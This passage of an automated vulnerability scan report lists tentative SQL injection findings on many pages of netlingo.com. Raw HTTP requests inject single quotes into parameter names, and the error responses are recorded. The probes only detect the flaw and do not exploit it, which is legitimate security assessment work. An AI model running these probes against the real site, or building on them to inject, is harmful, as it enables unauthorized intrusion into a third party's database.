Host:	http://www.netlingo.com
Path:	/press/teen-text-talk.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/teen-text-talk.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/teen-text-talk.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:55:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.95. http://www.netlingo.com/press/web.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/press/web.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /press/web.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /press/web.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 80093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.96. http://www.netlingo.com/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/search.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /search.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.97. http://www.netlingo.com/searchaction.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/searchaction.cfm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /searchaction.cfm?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /searchaction.cfm?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.98. http://www.netlingo.com/searchaction.cfm [wordsearch parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/searchaction.cfm

Issue detail

The wordsearch parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the wordsearch parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /searchaction.cfm?wordsearch=' HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /searchaction.cfm?wordsearch='' HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.99. http://www.netlingo.com/shop/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/shop/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cvdec0h51t0k7o22knmh2jtes1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=hd00odods0lc2mcdij9pevq4p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.100. http://www.netlingo.com/shop/netlingo-the-dictionary.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/netlingo-the-dictionary.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/netlingo-the-dictionary.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.101. http://www.netlingo.com/shop/netlingo-the-list.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/shop/netlingo-the-list.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/netlingo-the-list.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/netlingo-the-list.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.102. http://www.netlingo.com/shop/online-store.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/shop/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/online-store.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/online-store.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.103. http://www.netlingo.com/shop/shopping-cart.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/shop/shopping-cart.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shop/shopping-cart.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=p9c9ct3je5ii9vad32m3c8gn86; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /shop/shopping-cart.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=2g4a2u0pigp54vsur83c882sd2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 32824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.104. http://www.netlingo.com/smileys.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/smileys.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smileys.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /smileys.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 43271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.105. http://www.netlingo.com/subscribe.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/subscribe.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /subscribe.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /subscribe.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.106. http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/color-guide.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/color-guide.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/color-guide.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.107. http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/cyber-safety-statistics.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/cyber-safety-statistics.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/cyber-safety-statistics.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.108. http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/file-extensions.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/file-extensions.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/file-extensions.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.109. http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.110. http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/resources.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/resources.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/resources.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.111. http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.netlingo.com
Path:	/tips/webcasts.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/webcasts.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/webcasts.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
